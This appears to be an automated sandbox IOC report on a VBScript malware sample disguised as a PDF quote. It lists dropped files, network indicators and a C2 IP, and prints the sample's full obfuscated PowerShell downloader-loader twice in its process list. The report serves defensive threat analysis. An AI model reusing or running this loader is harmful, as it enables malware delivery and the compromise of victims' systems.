IOC Report
Request for Proposal Quote_2414976#U00b7pdf.vbs

loading gif

Files

File Path
Type
Category
Malicious
Request for Proposal Quote_2414976#U00b7pdf.vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Temp\Rundturens.txt
ASCII text, with very long lines (8395), with no line terminators
dropped
malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1of3zyjg.0ug.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bldymjpg.vt4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jdd1voxh.zxi.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mybmtgmq.e1r.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\188E93\31437F.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Roaming\188E93\31437F.lck
very short file (no magic)
dropped
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06
data
dropped
C:\Users\user\AppData\Roaming\gennemsgnings.Fas
ASCII text, with very long lines (65536), with no line terminators
dropped
There are 4 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Request for Proposal Quote_2414976#U00b7pdf.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmusemesminespipQuadratlEarnneti Jdeka tclownis(Upaak.a$ AjlendmCalciumoOpmaalidIntraduuSengetilIndtraeadecenehr S.opkei.ribesyzTonika,aEksament LenderiReassuroP.imaqunGreffot)Kl mren ');$Cereals148=$nymaane[0];Medicinmands (Refrig213 'Oseulov$DiffundgSnebol l,elinquoStibblebPilliveaAcroatilTaarnet:SokratiNForsvoroCabbalanMiljf rfbikini,e SkuffevM toricebruttoar Scop.eiBradsotsRevolveh MillimlTalemaayCratere=Hild nsN Grot,seGrsrddewr ferat-SkidterOSpr,gfrbunreseajDescendeSpinalvcKnaphultOverbbo Ov rskrSDiumviryNrrebrosSekstantDrukkenehypotypmTu,imin.Pre,urlN He.seseBlokindtHelicot.Remo.teWAngili,ePeng.afbKnishesC Pr,dukl Koldsvi tdlisteOffervinFu dskgt Entomi ');Medicinmands (Refrig213 ' Falski$StipendNAzoturio fortilnStruktufSpind neCaterinvDaneworeStackfurSexivaliBouillasOver.rdhB khamrlSquarefyKastnin.KnallerHbotswaneBrandtra SumptedRentesreOmmastrrch,loposJe.loja[Skole.a$applikaUBewil,en ,ommatpDeployesVektoreyLimonencSupporthredubbeopreencllUnmundao iblerngMegalosiForeplecFr,findaOksehallH rnesolRivstyrytennise2Skrivek5Optning3ancien.]roxbury=Stillin$Ski shaSNring btMeantclyTabelopgOver kkgSemiquieBrudefrrEneboe eHrolfgrsBarotro ');$Baandkassette=Refrig213 'AfbdpreN ncoacto Bogstan oumaphfa.meldeeSlaa invBa,tardeSkranker FrigiviKorr lssMeldrjehSlaglerlWhirtleyvortigi.AfblomsDFixatesoFngslinwsequestnpet,eanlirritamoVasoconaScutelsdLashligFSnekas iBufferrlDyrerygeM.croca(Chayspa$SemigeoC Cla.ateBalsamerDistribe Rebs aaJonosfrlUnballasReeject1Opbevar4 Smi st8Ben.asu,Selvtnk$Blndf,iT,arasanrMiljkrai Palm.vl PaketpoSubobsogLaminatiKomm.nis Abetto)Trodsal ';$Baandkassette=$Gewgawy[1]+$Baandkassette;$Trilogis=$Gewgawy[0];Medicinmands (Refrig213 ' Reinoc$BumblergBouffanlPl ckagoLd.rskobShopp.da ForbrnlKontrap:MadopskdYoghurteDe,ivedaBidroggcOmmateuiFyndfordmillibaiMul,elsfHeltalsiAttempte SuperldHinckle= Yach,d(SkruefoTFictioneProsocosSelenittUstulat-Un,ecipPP,ruvataSmrb.omtKontrolhGironsi Frastd$PuttendTTuringbrForsikriSneendelSkamskdoSsterdagApplanaiTobakshsFremsta)Mesomer ');while (!$deacidified) {Medicinmands (Refrig213 'Stokesi$AiledprgSjussetlPolariso MotherbGlaucodaNeut.oplh rkslu: SelvflSForanaltPopulare ptimisrTomentaoT,inglyiLavended Bastiop.verswerAssortepMindsteaLocan.ar,nhalataA corditGearendeReattentAccisen6Eksalte4Skvadro=Fodbol,$For.magtNonrecorHydrolouG,fteneeMa.titi ') ;Medicinmands $Baandkassette;Medicinmands (Refrig213 'UdstraaSEvadeentTskesbia TidnderTusindttDharmas-AlanineS Ultraml Ingre e DiakoneReswo epBjninge Program4 Haybil ');Medicinmands (Refrig213 'Sei mom$UfyldesgSlagvarlAflsseroForce.eb Su.aryaFrigrellSpiritu:Krag.rudFloggereBoligbya UnderscI ochimi QuicksdfootbriiBasketlfTeleutoi Nimblee Abbre dprodukt=Unsigna(PendlinT stabileSemiempsGladelitSemiper-StaalrrPPoluphlaAntyd itB,dbillhBe.andl Myo,ipo$MalpropTTrtidgerStercoriUtriculldatatraoAuktiong Etat.aiVestliksB.devin)Sl fnin ') ;Medicinmands (Refrig213 'Turesso$Me cedigBl,ebrslFredsbeomisbehabbask,tfaSloshinl Njagti:Tr nsmuDCessat i SpangloUdlbsdapAngiocatAntickmr Gearine,revordsR jfnin= Arbej.$.ffidavgR,frygtlUnexpiroAfskridbkna penaVejr orl Aridne:CaddishbSpindlea Spe dexHorsetrtStereopePop.lrvrN.settriLi estia IntracnKommand+F genbl+Brinjau%Fu.lefn$ edfrennRealindyAngelicmhjttaleaIsdessea DisconnFlimf.aeGrundop.PhilosocOpbygnioUnderspuLandhusnRedigertTo.ases ') ;$Cereals148=$nymaane[$Dioptres];}Medicinmands (Refrig213 'Tin.oli$Nucleoag LoppetlJordemoo Leky.hb Tyend.aSpa.ierlQuak er:FeedwatJOssetisoDoktorasQuadrictConventsUd,ldes Skislab=Fourtee OligosaGPlumbice ogribctLu.ubra- FiancaC,marevooGraminanConceitt SupersepandiesnArgynnitOutslid Coa apr$BlyanttTTorrefirWhiz eriSoignrelKlienteo Parro,gTriumfaiBobtailsUnim.ro ');Medicinmands (Refrig213 'Skrubtu$dainvksg Termosls.aryvioLandbrubOverstraFalsummlBrobane:Salvedpa MastoikPanteglvCozenagaResusciv,emiappi TelesktNavi.sgt teamereCym.grarnatkjo. Fessqu.= epichi Whodno[D sspriS Indi ey VocalisPromi,etMcelroye T lskdm Ski.te.unemendCTrefagso OdontonHybelenvTo vtoneMowlandrres.nertCinclid]Merp is:Nause u: play rFTonsillrDem.repoRap,cclmS.mmenkBTilfredaBest.alsMervrdieNsedes 6 fskeds4AbulyeiSWantonntAstmatirImmeritiAnholdtnKn,fordg Mlk tn(Su,erse$ FnatteJMerglinoUltimatsGuttlertAbstinesPrebend)Autosig ');Medicinmands (Refrig213 'Tydelig$Hols.ergRuma,ialAfsesseoNondelib twankaawindballl conis:Gl cehaOKittledp P.stmot BacchaeatmolyzgTabulatnAkt,icee MistanlBal,iums TorbeneKofa.gesTe.rifibRemonstoPrimaltg Blu deeGarde.enTilflyt1Synkrot9 Bagved9Rakkere slg ern=Pa ness Plumrin[MandacaSDtesfugyTims visLangplatLise queNatug.em Masede.Carmel,TFiredeletudistrxPejsesftdigress.MiriamsEStjernenHomoplac EksameoPilothod BurrieiNonrecinLaplndegPu.zler]kommuna:Skovl,n:Jukebo,AForh niSDemonstCPagodalI WaxersI Fladbu.Unt,ranGFravrspeForblfft.maaoveSTraktertAastederAlditoli Leak,gnforhjengUppoura(Dimensi$UdrmmedaHavebrukFormalivS ippleaD.tabasvOpsamlei,ommemotBefrd.dt P,atewe WesterrHarcele)elifdir ');Medicinmands (Refrig213 'Bal,eum$SrbehangFleraarlPre.isloFore.adbAnkomstaOversavlUnderfr:F gomraPDrmm.slr presseo SvindlvRemarrii cateravSpeanini UdbudssConnivee,andatacTyre ektSetnmpsiDroslenoF tometnGulvene=Cy oseu$ Ark bcOCoraisep Reaffit Flacoueorp,nsugSubs.nonGstelree Retrotl PreobtsReagente FremkasArcticwb bakkeroPaatagegK,nomoceSjos,esnOverint1Isadelp9,ucosmi9repatr,.RetslgesmirkyvkuHensynsb RemindsGenvurdtRaa.slar DemoraiOpkalden ThingugSt ikeo( Pipunc3 Bager,2A,niell5Ve,stre3Duksety3 Galope2Pe,mica, Inter.3Semip.i0unoccid3 Semido6Regnest3Tilside)Thala o ');Medicinmands $Provivisection;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmusemesminespipQuadratlEarnneti Jdeka tclownis(Upaak.a$ AjlendmCalciumoOpmaalidIntraduuSengetilIndtraeadecenehr S.opkei.ribesyzTonika,aEksament LenderiReassuroP.imaqunGreffot)Kl mren ');$Cereals148=$nymaane[0];Medicinmands (Refrig213 'Oseulov$DiffundgSnebol l,elinquoStibblebPilliveaAcroatilTaarnet:SokratiNForsvoroCabbalanMiljf rfbikini,e SkuffevM toricebruttoar Scop.eiBradsotsRevolveh MillimlTalemaayCratere=Hild nsN Grot,seGrsrddewr ferat-SkidterOSpr,gfrbunreseajDescendeSpinalvcKnaphultOverbbo Ov rskrSDiumviryNrrebrosSekstantDrukkenehypotypmTu,imin.Pre,urlN He.seseBlokindtHelicot.Remo.teWAngili,ePeng.afbKnishesC Pr,dukl Koldsvi tdlisteOffervinFu dskgt Entomi ');Medicinmands (Refrig213 ' Falski$StipendNAzoturio fortilnStruktufSpind neCaterinvDaneworeStackfurSexivaliBouillasOver.rdhB khamrlSquarefyKastnin.KnallerHbotswaneBrandtra SumptedRentesreOmmastrrch,loposJe.loja[Skole.a$applikaUBewil,en ,ommatpDeployesVektoreyLimonencSupporthredubbeopreencllUnmundao iblerngMegalosiForeplecFr,findaOksehallH rnesolRivstyrytennise2Skrivek5Optning3ancien.]roxbury=Stillin$Ski shaSNring btMeantclyTabelopgOver kkgSemiquieBrudefrrEneboe eHrolfgrsBarotro ');$Baandkassette=Refrig213 'AfbdpreN ncoacto Bogstan oumaphfa.meldeeSlaa invBa,tardeSkranker FrigiviKorr lssMeldrjehSlaglerlWhirtleyvortigi.AfblomsDFixatesoFngslinwsequestnpet,eanlirritamoVasoconaScutelsdLashligFSnekas iBufferrlDyrerygeM.croca(Chayspa$SemigeoC Cla.ateBalsamerDistribe Rebs aaJonosfrlUnballasReeject1Opbevar4 Smi st8Ben.asu,Selvtnk$Blndf,iT,arasanrMiljkrai Palm.vl PaketpoSubobsogLaminatiKomm.nis Abetto)Trodsal ';$Baandkassette=$Gewgawy[1]+$Baandkassette;$Trilogis=$Gewgawy[0];Medicinmands (Refrig213 ' Reinoc$BumblergBouffanlPl ckagoLd.rskobShopp.da ForbrnlKontrap:MadopskdYoghurteDe,ivedaBidroggcOmmateuiFyndfordmillibaiMul,elsfHeltalsiAttempte SuperldHinckle= Yach,d(SkruefoTFictioneProsocosSelenittUstulat-Un,ecipPP,ruvataSmrb.omtKontrolhGironsi Frastd$PuttendTTuringbrForsikriSneendelSkamskdoSsterdagApplanaiTobakshsFremsta)Mesomer ');while (!$deacidified) {Medicinmands (Refrig213 'Stokesi$AiledprgSjussetlPolariso MotherbGlaucodaNeut.oplh rkslu: SelvflSForanaltPopulare ptimisrTomentaoT,inglyiLavended Bastiop.verswerAssortepMindsteaLocan.ar,nhalataA corditGearendeReattentAccisen6Eksalte4Skvadro=Fodbol,$For.magtNonrecorHydrolouG,fteneeMa.titi ') ;Medicinmands $Baandkassette;Medicinmands (Refrig213 'UdstraaSEvadeentTskesbia TidnderTusindttDharmas-AlanineS Ultraml Ingre e DiakoneReswo epBjninge Program4 Haybil ');Medicinmands (Refrig213 'Sei mom$UfyldesgSlagvarlAflsseroForce.eb Su.aryaFrigrellSpiritu:Krag.rudFloggereBoligbya UnderscI ochimi QuicksdfootbriiBasketlfTeleutoi Nimblee Abbre dprodukt=Unsigna(PendlinT stabileSemiempsGladelitSemiper-StaalrrPPoluphlaAntyd itB,dbillhBe.andl Myo,ipo$MalpropTTrtidgerStercoriUtriculldatatraoAuktiong Etat.aiVestliksB.devin)Sl fnin ') ;Medicinmands (Refrig213 'Turesso$Me cedigBl,ebrslFredsbeomisbehabbask,tfaSloshinl Njagti:Tr nsmuDCessat i SpangloUdlbsdapAngiocatAntickmr Gearine,revordsR jfnin= Arbej.$.ffidavgR,frygtlUnexpiroAfskridbkna penaVejr orl Aridne:CaddishbSpindlea Spe dexHorsetrtStereopePop.lrvrN.settriLi estia IntracnKommand+F genbl+Brinjau%Fu.lefn$ edfrennRealindyAngelicmhjttaleaIsdessea DisconnFlimf.aeGrundop.PhilosocOpbygnioUnderspuLandhusnRedigertTo.ases ') ;$Cereals148=$nymaane[$Dioptres];}Medicinmands (Refrig213 'Tin.oli$Nucleoag LoppetlJordemoo Leky.hb Tyend.aSpa.ierlQuak er:FeedwatJOssetisoDoktorasQuadrictConventsUd,ldes Skislab=Fourtee OligosaGPlumbice ogribctLu.ubra- FiancaC,marevooGraminanConceitt SupersepandiesnArgynnitOutslid Coa apr$BlyanttTTorrefirWhiz eriSoignrelKlienteo Parro,gTriumfaiBobtailsUnim.ro ');Medicinmands (Refrig213 'Skrubtu$dainvksg Termosls.aryvioLandbrubOverstraFalsummlBrobane:Salvedpa MastoikPanteglvCozenagaResusciv,emiappi TelesktNavi.sgt teamereCym.grarnatkjo. Fessqu.= epichi Whodno[D sspriS Indi ey VocalisPromi,etMcelroye T lskdm Ski.te.unemendCTrefagso OdontonHybelenvTo vtoneMowlandrres.nertCinclid]Merp is:Nause u: play rFTonsillrDem.repoRap,cclmS.mmenkBTilfredaBest.alsMervrdieNsedes 6 fskeds4AbulyeiSWantonntAstmatirImmeritiAnholdtnKn,fordg Mlk tn(Su,erse$ FnatteJMerglinoUltimatsGuttlertAbstinesPrebend)Autosig ');Medicinmands (Refrig213 'Tydelig$Hols.ergRuma,ialAfsesseoNondelib twankaawindballl conis:Gl cehaOKittledp P.stmot BacchaeatmolyzgTabulatnAkt,icee MistanlBal,iums TorbeneKofa.gesTe.rifibRemonstoPrimaltg Blu deeGarde.enTilflyt1Synkrot9 Bagved9Rakkere slg ern=Pa ness Plumrin[MandacaSDtesfugyTims visLangplatLise queNatug.em Masede.Carmel,TFiredeletudistrxPejsesftdigress.MiriamsEStjernenHomoplac EksameoPilothod BurrieiNonrecinLaplndegPu.zler]kommuna:Skovl,n:Jukebo,AForh niSDemonstCPagodalI WaxersI Fladbu.Unt,ranGFravrspeForblfft.maaoveSTraktertAastederAlditoli Leak,gnforhjengUppoura(Dimensi$UdrmmedaHavebrukFormalivS ippleaD.tabasvOpsamlei,ommemotBefrd.dt P,atewe WesterrHarcele)elifdir ');Medicinmands (Refrig213 'Bal,eum$SrbehangFleraarlPre.isloFore.adbAnkomstaOversavlUnderfr:F gomraPDrmm.slr presseo SvindlvRemarrii cateravSpeanini UdbudssConnivee,andatacTyre ektSetnmpsiDroslenoF tometnGulvene=Cy oseu$ Ark bcOCoraisep Reaffit Flacoueorp,nsugSubs.nonGstelree Retrotl PreobtsReagente FremkasArcticwb bakkeroPaatagegK,nomoceSjos,esnOverint1Isadelp9,ucosmi9repatr,.RetslgesmirkyvkuHensynsb RemindsGenvurdtRaa.slar DemoraiOpkalden ThingugSt ikeo( Pipunc3 Bager,2A,niell5Ve,stre3Duksety3 Galope2Pe,mica, Inter.3Semip.i0unoccid3 Semido6Regnest3Tilside)Thala o ');Medicinmands $Provivisection;"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://24.199.107.111/index.php/927339792
24.199.107.111
malicious
https://www.google.com
unknown
http://nuget.org/NuGet.exe
unknown
http://drive.usercontent.google.com
unknown
https://aka.ms/pscore6lB
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://drive.google.com/
unknown
https://go.micro
unknown
https://drive.google.com/4
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://drive.google.com
unknown
https://drive.usercontent.google.com
unknown
https://drive.usercontent.google.com/
unknown
http://drive.google.com
unknown
https://aka.ms/pscore68
unknown
https://apis.google.com
unknown
http://crl.microv
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://24.199.107.111/index.php/927339792r
unknown
https://github.com/Pester/Pester
unknown
There are 14 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
bg.microsoft.map.fastly.net
199.232.210.172
drive.google.com
173.194.219.138
drive.usercontent.google.com
173.194.219.132

IPs

IP
Domain
Country
Malicious
24.199.107.111
unknown
United States
malicious
173.194.219.138
drive.google.com
United States
173.194.219.132
drive.usercontent.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\???????????????????????????????????????
188E93
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1A0DA98C000
trusted library allocation
page read and write
malicious
8EE0000
direct allocation
page execute and read and write
malicious
54C0000
heap
page read and write
malicious
63BC000
trusted library allocation
page read and write
malicious
AE11000
direct allocation
page execute and read and write
malicious
759B000
stack
page read and write
2293BD00000
heap
page read and write
2293BEB6000
heap
page read and write
89D5000
heap
page read and write
7ED0000
trusted library allocation
page read and write
15A10CA4000
heap
page read and write
2293BD5F000
heap
page read and write
7E50000
trusted library allocation
page read and write
7A4D000
heap
page read and write
2293BE45000
heap
page read and write
1A0C8BB9000
heap
page read and write
2293BD5A000
heap
page read and write
2293BEB6000
heap
page read and write
1A0CC1D0000
trusted library allocation
page read and write
7B50000
trusted library allocation
page read and write
2293C132000
heap
page read and write
58586FE000
stack
page read and write
1A0CA870000
heap
page execute and read and write
1A0CBBE1000
trusted library allocation
page read and write
208EE000
stack
page read and write
2293C125000
heap
page read and write
1A0C8B78000
heap
page read and write
52C0000
heap
page read and write
507E000
stack
page read and write
7E20000
trusted library allocation
page read and write
3530000
trusted library allocation
page read and write
7FF8490B0000
trusted library allocation
page read and write
2293BD83000
heap
page read and write
7610000
direct allocation
page read and write
8D8C000
stack
page read and write
1A0CAE16000
trusted library allocation
page read and write
2293C00F000
heap
page read and write
5E2DFEE000
stack
page read and write
2293BD44000
heap
page read and write
2293BD35000
heap
page read and write
1A0E2D60000
heap
page read and write
1A0CC784000
trusted library allocation
page read and write
22939E6E000
heap
page read and write
2293BE00000
heap
page read and write
2293BD3F000
heap
page read and write
5E2F48D000
stack
page read and write
1A0C8AC0000
heap
page read and write
2092F000
stack
page read and write
15A10860000
heap
page read and write
2293BD4C000
heap
page read and write
2096D000
stack
page read and write
7E40000
trusted library allocation
page read and write
7FF848FDA000
trusted library allocation
page read and write
1A0CADD4000
trusted library allocation
page read and write
2293BD5A000
heap
page read and write
2293BD89000
heap
page read and write
767D000
stack
page read and write
89C0000
trusted library allocation
page execute and read and write
7EE0000
trusted library allocation
page read and write
8A0B000
heap
page read and write
7A75000
heap
page read and write
2293BD1C000
heap
page read and write
58589FF000
stack
page read and write
209EE000
stack
page read and write
8A1C000
heap
page read and write
2293C0F6000
heap
page read and write
7FF849040000
trusted library allocation
page read and write
79EE000
stack
page read and write
6111000
trusted library allocation
page read and write
2293BD68000
heap
page read and write
5E2E83E000
stack
page read and write
1A0CC701000
trusted library allocation
page read and write
2293BD19000
heap
page read and write
2C40000
heap
page read and write
35A1000
remote allocation
page execute and read and write
7FF848E23000
trusted library allocation
page execute and read and write
20CDF000
stack
page read and write
2293C0F6000
heap
page read and write
2293C320000
heap
page read and write
